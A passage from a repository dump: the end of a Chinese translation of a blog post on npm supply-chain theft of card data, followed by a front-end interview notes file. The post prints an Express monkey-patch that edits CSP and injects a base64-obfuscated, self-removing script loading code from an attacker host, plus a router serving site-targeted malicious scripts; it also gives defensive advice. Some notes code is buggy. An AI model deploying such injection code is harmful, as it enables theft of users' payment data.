249 | 第二部分的回答是，如果你担心的恶意代码不仅仅是一些通用的代码，它可能会针对您的网站，message事件，并截获信用卡信息。我会单独拿出一部分来讲述，如何从针对性的恶意代码中来保护自己的网站......
250 | 
251 | ## 通用的恶意代码和针对性的恶意代码
252 | 
253 | 到目前为止，我描述了通用的恶意代码。也就是说，代码不知道它正在运行什么网站，它只是寻找，收集敏感信息并将敏感信息发送给远端服务器。
254 | 
255 | 另一方面，有针对性的恶意代码是专门为您的网站设计的。它由熟练的开发人员精心设计，他花了几周时间熟悉您网页DOM的每个角落。
256 | 
257 | 如果您的网站感染了有针对性的恶意代码，你完蛋了。就是这样。您可能已将所有内容放在安全的iframe中，但恶意代码只会删除iframe并用新的iframe替换。攻击者甚至可以更改您网站上显示的价格，可能会提供50％的折扣，并告诉用户如果他们想要货物，他们需要重新输入他们的信用卡详细信息。
258 | 
259 | 如果您的网站上有针对性的恶意代码，您也可以弯腰捡起一朵花并闻一闻 - 你知道，专注于生活中的积极事物更有意义。
260 | 
261 | 这就是为什么要有[content security policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)非常重要的原因。否则，攻击者可以通过向恶意服务器发送请求来批量分发通用恶意代码（例如，通过npm包），该恶意代码可以“升级”到目标代码，该服务器返回为您的站点定制的有效负载。
262 | 
263 | ```jsx
264 | 
265 | app.get('/analytics.js', (req, res) => {
266 |   if (req.get('host').includes('acme-sneakers.com')) {
267 |     res.sendFile(path.join(__dirname, '../malicious-code/targeted/acme-sneakers.js'));
268 |   } else if (req.get('host').includes('corporate-bank.com')) {
269 |     res.sendFile(path.join(__dirname, '../malicious-code/targeted/corporate-bank.js'));
270 |   } else if (req.get('host').includes('government-secrets.com')) {
271 |     res.sendFile(path.join(__dirname, '../malicious-code/targeted/government-secrets.js'));
272 |   } else if (req.get('host').includes('that-chat-app.com')) {
273 |     res.sendFile(path.join(__dirname, '../malicious-code/targeted/that-chat-app.js'));
274 |   } else {
275 |     res.sendFile(path.join(__dirname, '../malicious-code/generic.js'));
276 |   }
277 | });
278 | ```
279 | 
280 | 攻击者可以自由更新，并在闲暇时添加到目标代码中。
281 | 
282 | 你真的需要CSP！
283 | 
284 | ***
285 | 
286 | 好的，这是很长的说法：将iframe中的敏感数据用postMessage发送到父级，会略微增加您的风险。通用的恶意代码不太可能会利用这一点，但是针对性的代码无论如何都会获得用户的信用卡数据。
287 | 
288 | （郑重说明，我不会在我自己的小网站上使用选项1,2 或 3.我让专业人士处理我的信用卡数据，并且只提供Google / Facebook / Twitter的登录。如果你的未注册社交用户的收入和安全捕获和存储密码的成本大于风险所带来的收入总和，你不需要遵守这条规则）
289 | 
290 | 
291 | > 译者总结：主要是两种办法：1.加[content security policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)。2.将表单隔离到单独安全的html中
292 | 
293 | 
294 | # 其他漏洞点
295 | 
296 | > 译者：一下为扩展补充，并不常见，如有兴趣，可以继续阅读下去
297 | 
298 | 您可能会认为，如果您遵循上述建议，那么您就会安然无恙。不。我可以想到你可能遇到麻烦的其他四个地方，我发誓要用人群的智慧来持续更新这篇博客。
299 | 
300 | ## 1.在服务器上
301 | 
302 | 我现在有一个超轻量级的HTML文件，准备处理用户输入而免于被监视。我只需要将它粘贴在某个地方，以便它可以从一个单独的域提供。
303 | 
304 | 也许我会在某个地方启动一个简单的Node服务器。只因我想添加一个小的日志包......
305 | 
306 | ![yewai](https://github.com/luke93h/git-blog/blob/master/imgs/logjs.png?raw=true)
307 | 
308 | 好的，添加了204个包，但您可能想知道在仅提供文件的服务器上运行的代码，如何会危及在浏览器中键入的用户数据呢？
309 | 
310 | 好吧，问题是你的服务器上运行的任意npm包的代码，都可以为所欲为，包括处理网络请求。
311 | 
312 | 现在，我只是一个容易被this和call混淆的骗子开发，即使这样，我也可以编辑响应头的CSP，并在静态文件中注入代码，使网页请求我的邪恶域。
313 | 
314 | ```js
315 | const fs = require('fs');
316 | const express = require('express');
317 | 
318 | let indexHtml;
319 | const originalResponseSendFile = express.response.sendFile;
320 | 
321 | express.response.sendFile = function(path, options, callback) {
322 |   if (path.endsWith('index.html')) {
323 |     // add my domain to the content security policy
324 |     let csp = express.response.get.call(this, 'Content-Security-Policy') || '';
325 |     csp = csp.replace('connect-src ', 'connect-src https://adxs-network-live.com ');
326 | 
327 |     express.response.set.call(this, 'Content-Security-Policy', csp);
328 | 
329 |     // inject a cheeky little self-destructing script
330 |     if (!indexHtml) {
331 |       indexHtml = fs.readFileSync(path, 'utf8');
332 | 
333 |       const script = `
334 |         <script>
335 |           var googleAuthToken = document.createElement('script');
336 |           googleAuthToken.textContent = atob('CiAgICAgICAgY29uc3Qgc2NyaXB0RWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBzY3JpcHRFbC5zcmMgPSAnaHR0cHM6Ly9ldmlsLWFkLW5ldHdvcms/YWRfdHlwZT1tZWRpdW0nOwogICAgICAgIGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoc2NyaXB0RWwpOwogICAgICAgIHNjcmlwdEVsLnJlbW92ZSgpOyAvLyByZW1vdmUgdGhlIHNjcmlwdCB0aGF0IGZldGNoZXMKICAgICAgICBkb2N1bWVudC5zY3JpcHRzW2RvY3VtZW50LnNjcmlwdHMubGVuZ3RoIC0gMV0ucmVtb3ZlKCk7IC8vIHJlbW92ZSB0aGlzIHNjcmlwdAogICAgICAgIGRvY3VtZW50LnNjcmlwdHNbZG9jdW1lbnQuc2NyaXB0cy5sZW5ndGggLSAxXS5yZW1vdmUoKTsgLy8gYW5kIHRoZSBvbmUgdGhhdCBjcmVhdGVkIGl0CiAgICA=');
337 |           document.body.appendChild(googleAuthToken);
338 |         </script>
339 |       `;
340 | 
341 |       indexHtml = indexHtml.replace('</body>', `${script}</body>`);
342 |     }
343 | 
344 |     express.response.send.call(this, indexHtml);
345 |   } else {
346 |     originalResponseSendFile.call(this, path, options, callback);
347 |   }
348 | };
349 | ```
350 | 
351 | 当注入的脚本进入浏览器时，它将从邪恶的服务器加载一些（可能有针对性的）恶意JavaScript（可以因为CSP说它没问题），然后删除它自己的所有痕迹。
352 | 
353 | 上面的要点本身并没有实际用处（正如眼尖的读者发现的那样），真正的黑客可能不会像这样使用Express。我只是为了说明了你的服务器是很简陋的，并且那里运行的任何东西都有机会窃取用户在浏览器中输入的数据。
354 | 
355 | （如果您是软件包作者，可以考虑使用Object.freeze或Object.defineProperty中的writable: false以锁定您的内容。）
356 | 
357 | ***
358 | 
359 | 实际上，认为有Node模块做出与出站请求相关的事情可能有点牵强 - 对我而言，这太容易被发现了。
360 | 
361 | 我们的目的是创建一个不包含任何第三方代码的程序，但这里又给了第三方代码修改代码的机会。真的要这样做吗？这取决于你。
362 | 
363 | 我的建议是从静态文件服务器提供这些“安全”文件，或者干脆不要做任何事。
364 | 
365 | ## 2.发送到静态文件服务器
366 | 
367 | 是的，标题既是我们要做的是，也是漏洞的名称。
368 | 
369 | 我是Firebase静态托管的忠实粉丝，因为它能提供你所能期待的最高速度了，而且部署很容易。
370 | 
371 | 只需从npm安装firebase-tools和...哦！天啊！我正在使用npm包来避免npm包。
372 | 
373 | 好吧，深呼吸David，也许这是那些美丽的零依赖包之一。
374 | 
375 | 正在安装......安装......
376 | 
377 | ![yewai](https://github.com/luke93h/git-blog/blob/master/imgs/dep1.png?raw=true)
378 | 
379 | 天啊！640个依赖包！
380 | 
381 | 好的，我放弃提出建议，你只能靠你自己了。只能以某种方式将HTML文件放到服务器上。在某些时候，我们需要信任陌生人编写的代码。
382 | 
383 | 有趣的事实：写这篇文章需要几个星期的时间。我正在进行最终草案，我刚刚再次安装了Firebase工具，以检查我的数字是否正确...
384 | 
385 | ![yewai](https://github.com/luke93h/git-blog/blob/master/imgs/dep2.png?raw=true)
386 | 
387 | 我想知道这七个新包的作用是什么？我想知道管理Firebase开发者是否知道这七个新软件包的作用是什么？我想知道是否有人知道他们的包装需要什么依赖？
388 | 
389 | ## 3. Webpack
390 | 
391 | 您可能已经注意到我没有建议您将“安全”HTML文件添加到构建通道中（例如，共享CSS），即使这样可以解决代码重复问题。
392 | 
393 | 这是因为即使是最简单的Webpack构建，也会涉及数百个包，其中的任何一个都可能会修改构建过程的输出。Webpack本身需要367个包。像css-loader这样良性的loader会增加246 个。为了放入正确的CSS文件，您会使用优秀html-webpack-plugin，但它将添加156个包。
394 | 
395 | 尽管，我认为这些包中的任意一个都不会将脚本注入到您压缩后的代码中。但是，如果花费巨大的精力去制作一个原始的，手写的，人类可读的仓鼠友好的HTML文件是错误的，只是在睡觉前用几百个杜宾犬处理它。
396 | 
397 | ## 4.无能的攻击
398 | 
399 | 最后要防范的，也是最危险的事。这些东西可以修改你编写的任何代码，并清除你提出的任何安全防范：就像一个6岁大的孩子一样，不知道他们在做什么。
400 | 
401 | 这实际上是最难防范的事情之一。我能想到的唯一解决方案是各种“单元测试”，确保在任何这些“安全”文件中都没有外部脚本。
402 | 
403 | ```js
404 | const fs = require('fs');
405 | const path = require('path');
406 | const { JSDOM } = require('jsdom');
407 | 
408 | it('should not contain any external scripts, ask David why', () => {
409 |   const creditCardForm = fs.readFileSync(path.resolve(__dirname, '../public/credit-card-form.html'), 'utf8');
410 | 
411 |   const dom = new JSDOM(
412 |     creditCardForm,
413 |     { runScripts: 'dangerously' },
414 |   );
415 | 
416 |   const scriptElementWithSource = dom.window.document.querySelector('script[src]');
417 |   expect(scriptElementWithSource).toBe(null);
418 | });
419 | ```
420 | 
421 | 我允许\<script\>没有src属性（所以，内联代码），但阻止带有src属性的脚本标签。我设置了jsdom去执行脚本，以便我确认是否有人正在利用document.createElement()创建一个新的script元素。
422 | 
423 | 至少在这种情况下，如果想要添加一个脚本，还需要修改一个单元测试，如果运气好，这一举动将引起代码审核员的注意。
424 | 
425 | 在已发布的安全HTML文件上运行此类检查也是一个好主意。然后，您可以更轻松地使用Firebase工具和Webpack之类的工具，因为他们1200个软件包不会修改最终的输出。
426 | 
427 | # 包起来
428 | 
429 | 在我离开之前，我想谈谈过去几周我听到很多的声音 - 开发人员应该尽量少使用npm包。
430 | 
431 | 我理解这背后的原因：第三方包可能是恶意的，更少的第三方包装意味着更加安全。
432 | 
433 | 但这是一个糟糕的建议： 即使您使用了较少的 npm包，但是您的安全性依然不能得到保障。
434 | 
435 | 这就像让你的仓鼠独自与更少的杜宾犬待一起一样。
436 | 
437 | ***
438 | 
439 | 如果我明天开始一个新项目，创建一个处理高度敏感信息的网站，我依旧会使用React和Webpack以及Babel，就像我一个月前那样。
440 | 
441 | 我不在乎是否有一千个包，或者它们会不断变化，或者其中是否包含恶意代码。
442 | 
443 | 这些对我来说都不重要，因为我不打算将他们中的任何一个留在Baggy Pants教授的房间里。
444 | 
445 | 


--------------------------------------------------------------------------------
/src/自问自答.md:
--------------------------------------------------------------------------------
  1 | ## HTML5新增了哪些内容或API
  2 | 
  3 | - 新增api：Geolocation、Canvas/WebGL、webWorker、Audio/Video等等
  4 | - 新增标签：HTML 5提供了一些新的元素和属性，反映典型的现代用法网站。其中有些是技术上类似<div>和<span>标签，但有一定含义，例如<nav>（网站导航块）和<footer>``<audio>和<video>标记。
  5 | 
  6 | ## input和textarea的区别
  7 | 
  8 | - input: 单行输入，值为value
  9 | - textarea： 多行输入，值为children
 10 | 
 11 | ## flex布局-弹性布局
 12 | - 容器的属性
 13 | 1. flex-direction: row | row-reverse | column | column-reverse，主轴方向
 14 | 2. flex-wrap: nowrap | wrap | wrap-reverse，换行方式
 15 | 3. flex-flow：<flex-direction> || <flex-wrap>
 16 | 4. justify-content: flex-start | flex-end | center | sapce-between | space-around
 17 | 5. align-items: flex-start | flex-end | center | baseline | stretch
 18 | 6. align-content: flex-start | flex-end | center | space-between | space-around | stretch
 19 | - 项目属性
 20 | 1. order: <integer>
 21 | 2. flex-grow: <number>/* default 0 */
 22 | 3. flex-shrink: <number> /* default 1 */
 23 | 4. flex-basis: <length> | auto /* default auto */
 24 | 5. flex: flex-grow, flex-shrink 和 flex-basis的缩写
 25 | 6. align-self: auto | flex-start | flex-end | center | baseline | stretch
 26 | 
 27 | ## css相关实现
 28 | 
 29 | 1. 左边定宽、右边自适应
 30 | 
 31 | 2. BFC
 32 | 
 33 | 
 34 | ## es相关
 35 | 
 36 | 1. 数组方法
 37 |   - 创建方法：
 38 |   ```jsx
 39 |   var arr1 = [1, 2, 3, 4, 5];
 40 |   var arr2 = new Array(1, 2, 3, 4, 5)
 41 |   ```
 42 | 2. 增、删方法
 43 |   - push,pop,shift,unshift,splice
 44 |   ```js
 45 |   arr.splice(start, deleteCount, value)
 46 | 
 47 |   var a = [1,2,3]
 48 |   a.splice(1,1,222) // a为[1, 222, 3],返回[2]
 49 |   a.splice(1,2,333) // a为[1, 333],返回[222,3]
 50 |   ```
 51 | 3. 其他 
 52 |   - sort: 默认字典序；小于0--第一个参数在前，等于0-无所谓，大于0--第一个参数在后
 53 |   - slice：[start, end), 返回新数组
 54 |   - forEach,map,every,some
 55 |   - filter
 56 |   - reduce, reduceRight
 57 | 
 58 | ## 正则
 59 | 1. 字符类
 60 | 
 61 | | 正则 | 含义 |
 62 | | ------ | ------ |
 63 | | [...] | 方括号内的任意字符 |
 64 | | [^...] | 不在方括号内的任意字符 |
 65 | | . | 除换行符和终止符外的任意字符 |
 66 | | \w | [a-zA-Z0-9] |
 67 | | \W | [^a-zA-Z0-9] |
 68 | | \s | 空白符 |
 69 | | \S | 非空白符 |
 70 | | \d | [0-9] |
 71 | | \D | [^0-9] |
 72 | 
 73 | 2. 重复
 74 | 
 75 | 
 76 | | 正则 | 含义 |
 77 | | ------ | ------ |
 78 | | {n, m} | 至少n次，最多m次 |
 79 | | {n,} | 至少n次 |
 80 | | {n} | n次 |
 81 | | ? | 0次或者1次 |
 82 | | + | {1,} |
 83 | | * | {0,} |
 84 | 
 85 | 非贪婪匹配： ??  +?  *?,会尽可能少的匹配
 86 | 
 87 | 3. 选择、引用、分组
 88 | 
 89 | |  () \1 \2 \3 ......
 90 | (?....)： 只组合，不记忆
 91 | 
 92 | 4. 匹配位置
 93 | 
 94 | | 正则 | 含义 |
 95 | | ------ | ------ |
 96 | | ^ | 开头 |
 97 | | $ | 结尾 |
 98 | | \b | 单词边界 |
 99 | | \B | 非单词边界 |
100 | | (?=p) | 零宽正向先行断言 |
101 | | (?!p) | 零宽负向先行断言 |
102 | 
103 | 5. 修饰符
104 | 
105 | | 正则 | 含义 |
106 | | ------ | ------ |
107 | | i | 不区分大小写 |
108 | | g | 全局匹配 |
109 | | m | 多行匹配 |
110 | 
111 | 6. String方法
112 | - search
113 | - replace
114 | - match
115 | - split
116 | 
117 | 7. 正则方法
118 | - exec
119 | - test
120 | 
121 | ## cookie、localStorage、sessionStorage
122 | 
123 | 1. localStorage、sessionStorage  
124 | 
125 | 用法：
126 | 
127 | ```jsx
128 | var name = localStorage.name
129 | loacalStorage.name = 'luke'
130 | ```
131 | 
132 | > setItem、getItem、removeItem
133 | 
134 | | 不同处 | localStorage | sessionStorage |
135 | | ------ | ------ | ------ |
136 | | 有效期 | 永久 | 会话期间 |
137 | | 作用域 | 文档源 | 文档源+同一个窗口 |
138 | 
139 | > 文档源 = 协议名 + 主机名（例：https + www.baidu.com）
140 | 
141 | 2. onstaorage事件
142 | key newValue  oldValue storageArea url
143 | 
144 | 3. cookie 
145 | 
146 | 有效期： 默认直到浏览器关闭 ， expirationtime、max-age
147 | 
148 | 作用域：默认-协议 + 主机名 + 路径， domain、path可修改
149 | 
150 | ## 类型化数组和ArrayBuffer
151 | 
152 | ## 常用dom方法
153 | 
154 | 1. 获取dom
155 | 
156 |     - getElementById
157 |     - getElementsByName
158 |     - getElementsByTagName
159 |     - getElementsByClassName
160 |     - querySelectorAll
161 |     - querySelector
162 | 
163 | 2. Node属性
164 |     - parentNode 父节点
165 |     - childNodes 只读，类数组，实时子节点
166 |     - firstChild、lastChild 第一个、最后一个子节点
167 |     - nextSibling、previoursSibling 下一个、前一个兄弟节点
168 |     - nodeType 9-Document、1-Element、3-Text、8-Commnet、11-DocumentFragment
169 |     - nodeValue 节点的文本内容或注释内容
170 |     - nodeName 元素的标签名
171 | 
172 |     - firstElementChild、lastElementChild
173 |     - nextElementSibling、previoursElementSibling
174 |     - children
175 |     - childElementCount
176 | 
177 | 3. 设置和获取html属性  
178 |     - getAttribute
179 |     - setAttribute
180 |     - hasAttribute
181 |     - removeAttribute
182 |     - dataset
183 |     - attributes
184 |     - innerHTML
185 |     - textContent
186 |     - nodeValue
187 | 
188 | 4. 操作dom
189 |     - appendChild、insertBefore
190 |     - removeChild
191 | 
192 | 5. 坐标信息
193 |     - document.documentElement.pageXOffset、document.documentElement.pageYOffset 滚动条位置
194 |     - getBoundingClinetRect() , 返回left、top、right、bottom等属性，相对于视口
195 | 6. 选中文本的内容
196 |     - window.getSelection().toString()
197 |     - document.selection.createRange().text
198 | 
199 | ## React中 PureComponent 和 Component的区别
200 | - PureComponent：如果props和state没有发生改变,则shouldComponent返回false
201 | 
202 | - Component: shouldComponent默认返回true
203 | 
204 | 源码如下
205 | ```jsx
206 | function PureComponent(props, context, updater) {
207 |   ....
208 | }
209 | pureComponentPrototype.isPureReactComponent = true;
210 | 
211 | function checkShouldComponentUpdate(
212 |   workInProgress,
213 |   oldProps,
214 |   newProps,
215 |   oldState,
216 |   newState,
217 |   newContext,
218 | ) {
219 |   // 组件实例
220 |   const instance = workInProgress.stateNode;
221 |   // 组件构造函数
222 |   const ctor = workInProgress.type;
223 | 
224 |   // 用户定义的shouldComponentUpdate
225 |   if (typeof instance.shouldComponentUpdate === 'function') {
226 |     const shouldUpdate = instance.shouldComponentUpdate(
227 |       newProps,
228 |       newState,
229 |       newContext,
230 |     );
231 | 
232 |     return shouldUpdate;
233 |   }
234 | 
235 |   // PureComponent会返回浅比较的结果
236 |   if (ctor.prototype && ctor.prototype.isPureReactComponent) {
237 |     return (
238 |       !shallowEqual(oldProps, newProps) || !shallowEqual(oldState, newState)
239 |     );
240 |   }
241 | 
242 |   // Component默认返回true
243 |   return true;
244 | }
245 | ```
246 | 
247 | ## Explain event delegation 事件委派
248 | 
249 | 事件传播分为三个阶段
250 | 1. 捕获阶段
251 | 2. 发生事件的dom被触发
252 | 3. 冒泡阶段
253 | 
254 | ## this
255 | 
256 | 1. fn.bind(o,args...)
257 | 2. fn.call(o,args...)
258 | 3. fn.apply(0,[...args])
259 | 4. () => {}
260 | 5. new Fn()
261 | 6. obj.fn()
262 | 7. fn() // 指向window
263 | 
264 | ## prototype
265 | 
266 |  F = F.prototype.constructor
267 | 
268 | ## Explain why the following doesn't work as an IIFE: function foo(){ }()
269 | 
270 | 浏览器在执行js前 ，会先编译js文件；访问到此处，遇到function关键字，默认为函数声明，会将声明提前，导致执行失败；正确的使用方法是(function foo(){ })()
271 | 
272 | ## typeof
273 | 
274 | 
275 | | 类型 | 结果 |
276 | | ------ | ------ |
277 | | Null | 'object' |
278 | | Object | 'object' |
279 | | Array | 'object' |
280 | | RegExp | 'object' |
281 | | Date | 'object' |
282 | | Undefined | 'undefined' |
283 | | Boolean | 'boolean' |
284 | | Number | 'number' |
285 | | String | 'string' |
286 | | Symbol  | 'symbol' |
287 | | Function | 'function' |
288 | 
289 | ## JS怎样判断一个对象是否存在"环"？
290 | 
291 | 当要转化的对象有“环”存在时（子节点属性赋值了父节点的引用），为了避免死循环，JSON.stringify 会抛出异常
292 | 
293 | ```jsx
294 | function cycleDetector(obj) {
295 |   if(!isPlainObject(obj)){
296 |     console.log("obj须为纯对象");
297 |     return;
298 |   }
299 |   let hasCircle = false,
300 |     cache = [];
301 |   cycle(obj)
302 |   return hasCircle;
303 |   function isPlainObject(obj) {
304 |     return Object.prototype.toString.call(obj) === '[object Object]';
305 |   };
306 |   function cycle(obj) {
307 |     if(cache.indexOf(obj) != -1) {
308 |       hasCircle = true;
309 |       return;
310 |     };
311 |     cache.push(obj);
312 |     Object.keys(obj).forEach(key => {
313 |       const value = obj[key];
314 |       if (isPlainObject(value)) {
315 |         cycle(value);
316 |       }
317 |     })
318 |     cache.pop();
319 |   };
320 | };
321 | ```
322 | 
323 | ## 闭包
324 | 
325 | 定义：函数体内部的变量都可以保存在函数作用域内
326 | 
327 | 变量作用域在函数定义时决定，而不是执行时决定。
328 | 
329 | ## 函数式编程
330 | 
331 | 尽量使用函数来处理逻辑
332 | 
333 | ## 高阶函数
334 | 
335 | 操作函数的函数
336 | 
337 | ## 不完全函数
338 | 
339 | 把一次完整的函数调用拆分成多次函数调用
340 | 
341 | ## 记忆
342 | 
343 | 一种编程技巧，牺牲算法的空间复杂度以换取更优的时间复杂度，在客户端js中代码的执行时间复杂度往往成为瓶颈，因此十分推荐。
344 | 
345 | 一般利用闭包实现缓存功能。
346 | 
347 | ## 匿名函数的用处
348 | 
349 | 1. 传给高阶函数
350 | 2. IIFE
351 | 3. 赋值给变量，对象属性
352 | 
353 | ## 本地对象，宿主对象，内置对象
354 | 
355 | 1. Native Object：Object，Function，Array，Date
356 | 
357 | 2. host object: bom, dom
358 | 
359 | 3. buid-in Object: Math
360 | 
361 | ## call & apply
362 | 
363 | ```jsx
364 | let obj = {
365 |   a: 1
366 | }
367 | function add(b, c){
368 |   this.a = this.a + b + c
369 | }
370 | add.call(obj, 1, 2) // obj.a = 4
371 | add.apply(obj, [1, 2]) // obj.a = 7
372 | ```
373 | 
374 | ## feature detection、feature inference、UA string
375 | 
376 | 1. feature detection
377 | 
378 | ```jsx
379 | if( typeof Object.keys === 'function'){
380 |   let keys = Object.keys(obj)
381 | }
382 | ```
383 | 
384 | 2. feature inference
385 | 
386 | ```jsx
387 | if (document.getElementsByTagName) {
388 |   element = document.getElementById(id);
389 | }
390 | ```
391 | 
392 | 3. UA string
393 | 
394 | ```jsx
395 | if (navigator.userAgent.indexOf("MSIE 7") > -1){
396 |     //do something
397 | }
398 | ```
399 | 
400 | ## Ajax
401 | ```jsx
402 | function get(url, cb) {
403 |   var req = new XMLHttpRequest()
404 |   req.open('GET', url)
405 |   req.onreadystatechange = function() {
406 |     if(request.readyState === 4 $$ request.satatus === 200){
407 |       var type = request.getResponseHeader('Content-Type')
408 |       if(type === 'application/json'){
409 |         cb(JSON.parse(request.responseText))
410 |       }else{
411 |         cb(request.responseText)
412 |       }
413 |     }
414 |   }
415 |   req.send(null)
416 | }
417 | ```
418 | 
419 | ## JSONP
420 | 
421 | 预先定义函数，在引入的跨域脚本中调用该函数。
422 | 
423 | ## 类型转换
424 | 
425 | 
426 | |   值   |  转化为字符串  |   数字    |   布尔值   |    对象    |
427 | | ------ | ------------- | -------- | ---------- | ---------- |
428 | | undefineed | 'undefined' | NaN | false | throwsTypeError |
429 | | null | 'null' | 0 | false | throwsErrow |
430 | | true | 'true' | 1 |  | new Boolean(true) |
431 | | false | 'false' | 0 |  | new Boolead(false) |
432 | | '' |  | 0 | false | new String('') |
433 | | '1.2' |  | 1.2 | true | new String('1.2') |
434 | | 'one' |  | NaN | true | new String('one') |
435 | | 0 | '0' |  | false | new Number(0) |
436 | | -0 | '0' |  | false | new Number(0) |
437 | | Infinity |  | 'Infinity' | true | new Number(Infinity) |
438 | | -Infinity |  | '-Infinity' | true | new Number(-Infinity) |
439 | | 1 |  | '1' | true | new Number(1) |
440 | 
441 | ## Difference between window load event and document DOMContentLoaded event
442 | 
443 | 1. window load: 整个页面j加载完毕，包括图片，css，scripts
444 | 2. document load: dom可以使用，优先于图片和其他内容
445 | 
446 | ## 三元操作符
447 | 
448 | 1. 三元是指三个操作数
449 | ```jsx
450 | getting = "hello" + (username ? username : "there")
451 | ```
452 | 
453 | ## 单页应用
454 | 
455 | 单页Web应用（single page web application，SPA），就是只有一张Web页面的应用，是加载单个HTML 页面并在用户与应用程序交互时动态更新该页面的Web应用程序。
456 | 
457 | 优点：
458 | 1. 分离前后端关注点，前端负责界面显示，后端负责数据存储和计算，各司其职，不会把前后端的逻辑混杂在一起；
459 | 2. 减轻服务器压力，服务器只用出数据就可以，不用管展示逻辑和页面合成，吞吐能力会提高几倍
460 | 3. 开发效率极高，速度快，质量高，产量多。
461 | 缺点： 
462 | 1. SEO问题，现在可以通过Prerender等技术解决一部分；
463 | 
464 | ## mutable and immutable objects
465 | 
466 | 如果一个对象它被构造后其，状态不能改变，则这个对象被认为是不可变的（immutable ）。
467 | 
468 | ## 箭头函数
469 | 
470 | 绑定this
471 | 
472 | ## 怎么去设计一个组件封装
473 | 
474 | 1. 根据业务需求先实现组件功能
475 | 2. 如果出现复用场景，通过重构抽象出来
476 | 3. 考虑属性是通过props传，还是通过state保存（最难的一点）
477 | 
478 | ## js 异步加载的方式
479 | 
480 | ## css 动画和 js 动画的差异
481 | 
482 | ## XSS 与 CSRF 两种跨站攻击
483 | 
484 | ## 事件委托，目的，功能，写法
485 | 
486 | ## ArrayBuffer、TypedBuffer、DataView
487 | 
488 | js操作二进制的初衷是为了提升webgl的性能
489 | 
490 | 
491 | |   构造函数   |  数字类型  |
492 | | ------ | ------------- |
493 | | Int8Array() | 有符号字节 |
494 | | Uint8Array() | 无符号字节 |
495 | | Int16Array() | 有符号16位短整数 |
496 | | Uint16Array() | 无符号16位短整数 |
497 | | Int32Array() | 有符号32位整数 |
498 | | Uint32Array() | 无符号32位整数 |
499 | | Float32Array() | 32位浮点数值 |
500 | | Float64Array() | 64位浮点数值：javascript中的常规数字 |
501 | 
502 | 1. rrayBuffer对象的各种 TypedArray 视图，是用来向网卡、声卡之类的本机设备传送数据，所以使用本机的字节序就可以了；
503 | 2. DataView视图的设计目的，是用来处理网络设备传来的数据，所以大端字节序或小端字节序是可以自行设定的。
504 | 
505 | ## SQL注入、XSS、CSRF
506 | 
507 | 1. SQL注入：所谓SQL注入式攻击，就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的SQL命令。 
508 | 
509 | 2. 跨站脚本攻击(XSS)- Cross-site scripting
510 | 
511 | 3. CSRF：又称XSRF，冒充用户发起请求（在用户不知情的情况下）
512 | 
513 | 4. npm代码注入攻击
514 | 
515 | ## 实现一个事件监听
516 | 
517 | ```jsx
518 | function Plugin() {
519 |   this.listeners = {}
520 | }
521 | 
522 | Plugin.prototype.on = function on(eventName, linstener) {
523 |   if(typeof listener !== 'function'){
524 |     return console.log('lintener must be function')
525 |   }
526 |   if(typeof this.listeners[eventName] === 'undefined' ){
527 |     this.listeners[eventName] = []
528 |   }
529 |   if(this.listeners[eventName].indexOf(listener) >= 0){
530 |     return console.log('listener is already registered')
531 |   }
532 |   this.listeners[eventName](listener)
533 | }
534 | 
535 | Plugin.prototype.off = function off(eventName, linstener) {
536 |   let curListeners = this.listeners[eventName]
537 | 
538 |   if(typeof listener !== 'function'){
539 |     return 
540 |   }
541 |   if(typeof curListeners === 'undefined' ){
542 |     return
543 |   }
544 |   if(curListeners.indexOf(listener) < 0){
545 |     return 
546 |   }
547 |   let index = curListeners.indexOf(listener)
548 |   curListeners.splice(index,1)
549 | }
550 | 
551 | Plugin.prototype.emit = function(eventName, args){
552 |   let curListeners = this.listeners[eventName]
553 | 
554 |   if(typeof curListeners === 'undefined' ){
555 |     return
556 |   }
557 |   if(curListeners.length === 0){
558 |     return 
559 |   }
560 |   curListeners.forEach((fn, index) => {
561 |     fn(...args)
562 |   })
563 | }
564 | 
565 | ```
566 | 
567 | ## 解析url参数
568 | 
569 | ```jsx
570 | var url = 'http://www.domain.com/?user=anonymous&id=123&id=456&city=%E5%8C%97%E4%BA%AC&d&enabled';
571 | parseParam(url); 
572 | 
573 | /**
574 | 结果：
575 | {
576 |   user: 'anonymous',
577 |   id: [123, 456], // 重复出现的 key 要组装成数组，能被转成数字的就转成数字类型
578 |   city: '北京', // 中文
579 |   enabled: true, // 未指定值的 key 约定值为 true
580 | }
581 | */
582 | 
583 | function parseParam(url) {
584 |   let queryStr = url.split('?')[1]
585 |   let rst = {}
586 |   if(queryStr === undefined){
587 |     return rst
588 |   }
589 |   let queryArr = queryStr.split('&')
590 |   for(let i = 0; i < queryArr.length; i++){
591 |     let [name, value = true] = queryArr[i].split('=')
592 |     if(typeof value === 'string'){
593 |       value = decodeURIComponent(value)
594 |     }
595 |     if(Object.keys(rst).indexOf(name) >= 0 ){
596 |       if(!1(rst[name] instance Array)){
597 |         rst[name] = [rst[name]]
598 |       }
599 |       rst[name].push(value)
600 |     }else{
601 |       rst[name] = value
602 |     }
603 |   }
604 |   return rst
605 | }
606 | ```
607 | 
608 | ## Promise
609 | 
610 | 1. 基本应用
611 | 
612 | ```jsx
613 | let promise = new Promise((resolve,reject) => {
614 |   setTimeout(resolve, 2000)
615 | })
616 | ```
617 | 
618 | 3.将一个任意长的数字变成逗号分割的格式 
619 | 
620 | ```jsx
621 | // 1234.56 => "1,234.56" , 123456789 => "123,456,789"
622 | parseToMoney(1234.56) // return "1,234.56"
623 | ```
624 | ## 实现一个最简单的模板引擎
625 | ```jsx
626 | render('我是{{name}}，年龄{{age}}，性别{{sex}}',{
627 | 	name:'姓名',
628 | 	age:18
629 | })
630 | 
631 | // 结果： 我是姓名，年龄18，性别undefined。
632 | var render = function(tpl,data){
633 | 	return tpl.replace(/\{\{(.+?)\}\}/g,function(m,m1){
634 | 		return data[m1]
635 | 	})
636 | }
637 | ```
638 | 
639 | ## 将一个任意长的数字变成逗号分割的格式
640 | ```jsx
641 | // 1234.56 => "1,234.56" , 123456789 => "123,456,789"
642 | parseToMoney(1234.56) // return "1,234.56"
643 | function parseToMoney(num) {
644 |   let strNum = String(num)
645 |   let [int, decimal] = strNum.split('.')
646 |   let reault = ''
647 |   if(decimal){
648 |     result = `.${decimal}`
649 |   }
650 |   let intArr = int.split('')
